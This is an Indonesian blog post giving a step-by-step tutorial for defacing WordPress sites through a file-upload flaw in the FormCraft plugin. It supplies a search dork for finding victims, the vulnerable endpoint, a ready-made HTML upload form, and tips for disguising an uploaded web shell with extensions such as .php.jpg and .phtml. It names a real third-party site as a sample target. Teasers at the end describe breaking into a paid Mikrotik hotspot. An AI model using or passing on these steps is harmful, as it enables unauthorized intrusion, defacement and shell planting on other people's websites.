Langsung ke konten utama

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0

Hikigaya, Ayanokouji

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0 - Sesuai dengan judul postingan, kali ini saya akan memberikan tutorial untuk melakukan hacking atau deface sebuah website.

Target kita kali ini adalah situs yang menggunakan CMS WordPress, dan kita akan memanfaatkan kelamahan dari plugin FromCraft yang terinstall di situs target.

Dork : inurl:"/wp-content/plugins/formcraft/"
Exploit : /wp-content/plugins/formcraft/file-upload/server/content/upload.php
Target yang vuln akan memunculkan tulisan seperi ini : {"failed":"No file found 2"}


Silahkan dorking dulu untuk mencari target. Dork bisa kalian kembangkan sendiri biar lebih mantap.



Berikut ini adalah salah satu contoh target yang vuln.

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Setelah mendapatkan target yang vuln, selanjutnya kita akan menggunakan CSRF untuk mengupload file kita.

***CSRF***
<form method="POST" action="[Alamat_Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Kemudian, simpan kode CSRF yang telah saya berikan dalam format html, dan jangan lupa untuk mengganti [Alamat_Target] sesuai dengan alamat dari target kita.

Untuk nama filenya terserah kamu, yang penting adalah format harus .html

Setelah itu, buka file CSRF yang telah kita buat tadi menggunakan web browser.


Sekarang pilih file yang ingin kamu upload, dan tekan Upload.

Jika muncul tulisan seperti pada gambar dibawah ini, berarti file kita telah berhasil tersimpan di website target.


Perlu diperhatikan, bahwa nama file yang kita upload akan berubah setelah diproses oleh server.

Dalam kasus ini, file yang saya upload bernama "arter.html" kemudian berubah nama menjadi "15d9606bedf01e---arter.html".

Sekarang kita tinggal mengakses file yang telah diupload tadi.


Direktori file kita : target/wp-content/plugins/formcraft/file-upload/server/content/files/nama_filekamu

Dan hasilnya akan seperti ini:

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/files/15d9606bedf01e---arter.html

Kalo kamu mau menebas index website, silahkan upload shell andalah kamu.

Jenis ekstensi yang didukung : namafile.html, namafile.php, namafile,jpg, namafile.gif.

Untuk upload shell, kamu bisa menyamarkannya dengan menggunakan namafile.php.jpg, namafile.php5, namafile.phtml, namafile.php;.gif, dan sebagainya. Silahkan gunakan otak kamu.

Btw, jika balasan dari website adalah {"failed":"Not writable"}, berarti bug di web itu telah diperbaiki.

Beberapa contoh target yang masih vuln:



Goodluck.

Postingan populer dari blog ini

Percantik Tampilan Linux Mint Dengan Tema Adapta Nokto

Kemarin saya menginstall linux mint dan hari ini saya memutuskan untuk mengubah tampilannya dengan menggunakan tema yang lain. Tema yang saya gunakan adalah Adapta Nokto. Itulah tampilan sistem operasi linux mint saya saat menggunakan tema adapta nokto. Untuk rinciannya bisa dilihat pada gambar berikut. Untuk cara menginstallnya mungkin akan saya tulis di postingan selanjutnya.
Lanjutkan membaca...

Cara Menyambungkan Hotshare HTTP Injector di Sistem Operasi Linux

Buat kalian yang belum tahu, HTTP Injector adalah salah satu aplikasi android yang bisa digunakan untuk mengakses internet secara gratis. Sebenarnya masih banyak fungsi lain dari aplikasi ini tetapi saya tidak akan membahasnya. Silahkan cari informasinya sendiri. Sedikit informasi, sebenarnya dari aplikasi HTTP Injector-nya sudah ada fitur untuk berbagi hotspot kita, tetapi cari ini hanya bisa digunakan untuk hp yang memiliki akses root. Karena beberapa alasan saya belum melakukan root untuk hp yang saya gunakan. Hal  ini merupakan suatu masalah karena jika kita mengaktifkan hotspot saat menggunakan HI pada perangkat yang belum di root, maka perangkat lain yang tersambung di hotspot kita tidak bisa ikut menikmati akses internet gratisnya. Untungnya, sang pembuat aplikasi ini telah menyediakan fitur Hotshare yang bisa memudahkan kita yang hpnya belum di root. Setelah di aktifkan, kita tinggal mengikuti tutorial yang ada. Sayangnya, di situs guide tersebut tidak ada tutorial untuk si...
Lanjutkan membaca...

Penetration Test di Hostpot Mikrotik

Saya menulis ini hanya untuk kenang-kenangan saja, seandainya saya mengalami amnesia. Karena ada tetangga yang jualan hotspot mikrotik, saya berencana untuk berlangganan hostpot tersebut setelah kuota internet saya habis sebagai alternatif dari kuota telkomsel yang sangat mahal. Hari ini saya iseng-iseng mencoba konek ke jaringan tersebut tapi malah disuruh login pake username dan password yang mesti dibeli dulu. Setelah coba beberapa cara, eh ternyata bisa masuk juga. Lumayan, untuk download anime gratis :v Berikut ini beberapa screenshot yang saya ambil. Btw, saya berhasil masuk sampai ke admin mikrotiknya. Yabai desu ne!
Lanjutkan membaca...